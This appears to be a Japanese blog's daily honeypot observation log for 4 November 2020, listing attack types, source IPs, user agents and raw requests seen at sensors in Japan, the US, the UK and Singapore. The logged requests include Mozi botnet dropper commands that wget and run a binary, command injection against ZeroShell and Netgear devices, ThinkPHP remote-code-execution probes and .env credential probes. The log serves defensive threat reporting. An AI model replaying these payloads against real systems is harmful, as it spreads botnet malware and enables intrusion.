コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2020/11/04 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2020/11/04分です。

特徴
Location:JP

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
WordPress Pluginへのスキャン行為
WordPressログイン画面に対するログイン試行するアクセス
を確認しました。

Location:US

FCKEditorの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
IDBTE4M CODE87によるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
WordPressログイン画面に対するログイン試行するアクセス
123[.]125[.]114[.]144に関する不正通信
を確認しました。

Location:UK

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
WordPress Pluginへのスキャン行為
を確認しました。

Location:SG

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
WordPress Pluginへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//172[.]39[.]3[.]201:51241/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
アクセス数推移

JP:総アクセス数:31 (前日比:+8)
US:総アクセス数:137 (前日比:+82)
UK:総アクセス数:26 (前日比:-22)
SG:総アクセス数:44 (前日比:-97)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 3.236.55.221 United States
1 20.51.184.10 United States
2 35.244.120.201 United States
1 37.34.56.200 Netherlands
1 51.103.34.7 United Kingdom
1 80.82.65.80 Netherlands
2 80.82.68.59 Netherlands
1 91.193.5.58 Australia
1 159.89.195.18 United States
1 162.243.128.171 United States
2 169.45.99.50 United States
1 180.149.125.164 Mongolia
2 185.142.236.43 Netherlands
1 185.239.242.117 Netherlands
1 188.166.242.78 Netherlands
1 192.241.214.46 United States
1 192.241.235.77 United States
9 193.27.229.26 Russia
1 222.186.136.150 China

UserAgent一覧

件数 UserAgent
6 -
1 Go-http-client/1.1
2 Mozilla Firefox Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0
9 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
4 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
4 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /ErKNDtwEzynKq/index.php HTTP/1.1
1 GET /MfDe HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /c/ HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /portal/redlion HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
1 OPTIONS / HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.58.24.126 United States
1 27.224.136.189 China
51 34.123.167.136 United States
2 35.228.174.39 United States
1 36.32.3.134 China
1 39.64.191.87 China
13 40.84.141.131 United States
5 40.84.142.30 United States
1 42.231.156.64 China
1 46.101.139.73 Netherlands
1 60.25.55.126 China
1 80.82.65.80 Netherlands
1 91.193.5.58 Australia
7 103.141.104.10 Indonesia
1 113.206.128.108 China
1 113.206.196.98 China
1 120.35.40.167 China
2 121.43.191.224 China
1 123.179.6.35 China
1 124.227.31.24 China
1 124.227.31.30 China
1 124.235.138.137 China
1 125.44.12.6 China
1 129.146.190.190 United States
3 163.172.159.134 United Kingdom
3 163.172.161.118 United Kingdom
4 164.52.24.163 China
4 169.45.99.50 United States
1 171.36.130.247 China
1 171.118.241.176 China
1 172.105.89.161 United States
1 180.95.231.177 China
1 180.149.125.172 Mongolia
1 182.138.137.152 China
2 185.239.242.117 Netherlands
1 192.241.236.20 United States
1 192.241.238.80 United States
1 192.241.239.39 United States
9 193.27.229.26 Russia
1 193.106.31.106 Ukraine
1 221.11.4.155 China
1 222.94.140.69 China
1 222.186.136.150 China
1 223.166.74.95 China

UserAgent一覧

件数 UserAgent
71 -
1 Go-http-client/1.1
1 IDBTE4M CODE87
4 Mozilla Firefox Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0
1 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
8 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
9 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
2 Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
6 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
12 Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.01682558 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/537.36(KHTML, like Gecko) Chrome/40.0.2214.89 Safari/537.36
1 Mozilla/5.01732016 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
8 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3

リクエスト内容一覧

件数 Method Request Protocol
1 -
3 \x16\x03\x01
2 \x16\x03\x01\x01\"\x01
2 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
2 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
2 CONNECT www[.]bing[.]com/:443 HTTP/1.1
2 CONNECT www[.]ipip[.]net/:443 HTTP/1.1
2 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
8 GET /.env HTTP/1.1
1 GET //MyAdmin/scripts/setup.php HTTP/1.1
1 GET //PMA2005/scripts/setup.php HTTP/1.1
1 GET //admin/mysql/scripts/setup.php HTTP/1.1
1 GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1
1 GET //admin/scripts/setup.php HTTP/1.1
1 GET //db/scripts/setup.php HTTP/1.1
1 GET //dbadmin/scripts/setup.php HTTP/1.1
1 GET //myadmin/scripts/setup.php HTTP/1.1
1 GET //mysql-admin/scripts/setup.php HTTP/1.1
1 GET //mysql/scripts/setup.php HTTP/1.1
1 GET //mysqladmin/scripts/setup.php HTTP/1.1
1 GET //mysqlmanager/scripts/setup.php HTTP/1.1
1 GET //nosuichfile.php HTTP/1.1
1 GET //noxdir/nosuichfile.php HTTP/1.1
1 GET //p/m/a/scripts/setup.php HTTP/1.1
1 GET //pHpMy/scripts/setup.php HTTP/1.1
1 GET //pHpMyAdMiN/scripts/setup.php HTTP/1.1
1 GET //php-my-admin/scripts/setup.php HTTP/1.1
1 GET //php-myadmin/scripts/setup.php HTTP/1.1
1 GET //phpMyA/scripts/setup.php HTTP/1.1
1 GET //phpMyAdmi/scripts/setup.php HTTP/1.1
1 GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1
1 GET //phpMyAdmin-3/scripts/setup.php HTTP/1.1
1 GET //phpMyAdmin-4/scripts/setup.php HTTP/1.1
2 GET //phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET //phpMyAdmin1/scripts/setup.php HTTP/1.1
1 GET //phpMyAdmin2/scripts/setup.php HTTP/1.1
1 GET //phpMyAds/scripts/setup.php HTTP/1.1
1 GET //phpm/scripts/setup.php HTTP/1.1
1 GET //phpmanager/scripts/setup.php HTTP/1.1
1 GET //phpmy-admin/scripts/setup.php HTTP/1.1
1 GET //phpmy/scripts/setup.php HTTP/1.1
1 GET //phpmyad-sys/scripts/setup.php HTTP/1.1
1 GET //phpmyad/scripts/setup.php HTTP/1.1
2 GET //phpmyadmin/scripts/setup.php HTTP/1.1
1 GET //phpmyadmin2/scripts/setup.php HTTP/1.1
2 GET //pma/scripts/setup.php HTTP/1.1
1 GET //pma2005/scripts/setup.php HTTP/1.1
1 GET //scripts/setup.php HTTP/1.1
1 GET //sqladmin/scripts/setup.php HTTP/1.1
1 GET //sqlmanager/scripts/setup.php HTTP/1.1
1 GET //sqlweb/scripts/setup.php HTTP/1.1
1 GET //vhcs2/tools/pma/scripts/setup.php HTTP/1.1
1 GET //web/phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET //webadmin/scripts/setup.php HTTP/1.1
1 GET //webdb/scripts/setup.php HTTP/1.1
1 GET //websql/scripts/setup.php HTTP/1.1
2 GET /050XNFeuojFKn6rs/index.php HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /ErKNDtwEzynKq/index.php HTTP/1.1
1 GET /JTNp HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /admin/includes/general.js HTTP/1.1
1 GET /admin/view/javascript/common.js HTTP/1.1
1 GET /administrator/ HTTP/1.1
1 GET /administrator/help/en-GB/toc.json HTTP/1.1
1 GET /administrator/language/en-GB/install.xml HTTP/1.1
1 GET /c/ HTTP/1.1
7 GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0
3 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /images/editor/separator.gif HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /js/header-rollup-554.js HTTP/1.1
1 GET /misc/ajax.js HTTP/1.1
1 GET /muieblackcat HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /plugins/system/debug/debug.xml HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//125[.]44[.]12[.]6:54325/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/build.xml HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-includes/js/jquery/jquery.js HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET http[:]//boxun[.]com/ HTTP/1.1
2 GET http[:]//www[.]123cha[.]com/ HTTP/1.1
2 GET http[:]//www[.]bing[.]com/ HTTP/1.1
2 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
1 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
2 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
2 HEAD http[:]//123[.]125[.]114[.]144/ HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//manam[.]fun/54792b8905cea1d983421d30b98dda8d30dab5bfe5efb212baf0db30ecf5711eef2be2c597d588cd7a84f9bd93cb646820abed4dfc73bd234692dd609cb03de203978852bd811c6b379e4e619fff12644bdd06a5d97cf47e195d73290f590598 HTTP/1.1
1 POST http[:]//niezwykla[.]website/84c920c8e9a0b06cda571ab690654cc48562917830ce1daea6e339943a817746b9c845f4c34b56becbca5a1c329ecd7b0c31e42e8c8a314f52bb0523ae832c25f620205147c3693b623030632bb94d6d04a6a8e2f4974c00abc705e6617ea9aa HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
2 34.91.39.95 United States
1 80.82.65.80 Netherlands
1 91.193.5.58 Australia
1 139.162.145.250 Netherlands
4 157.7.162.55 Japan
2 169.45.99.50 United States
1 172.105.89.161 United States
1 180.149.125.169 Mongolia
1 192.241.236.126 United States
1 192.241.236.197 United States
9 193.27.229.26 Russia
1 193.106.31.106 Ukraine
1 222.186.136.150 China

UserAgent一覧

件数 UserAgent
5 -
1 Go-http-client/1.1
2 Mozilla Firefox Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
9 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
4 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 \x16\x03\x01
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
1 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /ErKNDtwEzynKq/index.php HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /bag2 HTTP/1.1
1 GET /c/ HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /rkF9 HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /storage/.env HTTP/1.1
1 GET /vendor/.env HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
2 35.188.236.23 United States
1 80.82.65.80 Netherlands
2 80.82.68.70 Netherlands
1 80.82.70.118 Netherlands
1 91.193.5.58 Australia
1 106.124.37.240 China
1 114.235.12.80 China
10 139.155.243.41 China
1 139.162.145.250 Netherlands
8 169.45.99.50 United States
1 180.149.125.164 Mongolia
1 185.239.242.117 Netherlands
1 192.241.218.81 United States
1 192.241.220.153 United States
1 192.241.237.214 United States
9 193.27.229.26 Russia
1 193.106.31.106 Ukraine
1 221.15.196.229 China

UserAgent一覧

件数 UserAgent
6 -
1 Go-http-client/1.1
1 Hello, World
1 Hello, world
8 Mozilla Firefox Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
9 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 \x16\x03\x01
1 \x16\x03\x02\x01o\x01
2 GET /050XNFeuojFKn6rs/index.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /ErKNDtwEzynKq/index.php HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
2 GET /artifact64.exe HTTP/1.1
1 GET /bag2 HTTP/1.1
1 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
1 GET /c/ HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
2 GET /debug_gate.php HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
1 GET /nsC8 HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//172[.]39[.]3[.]201:51241/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1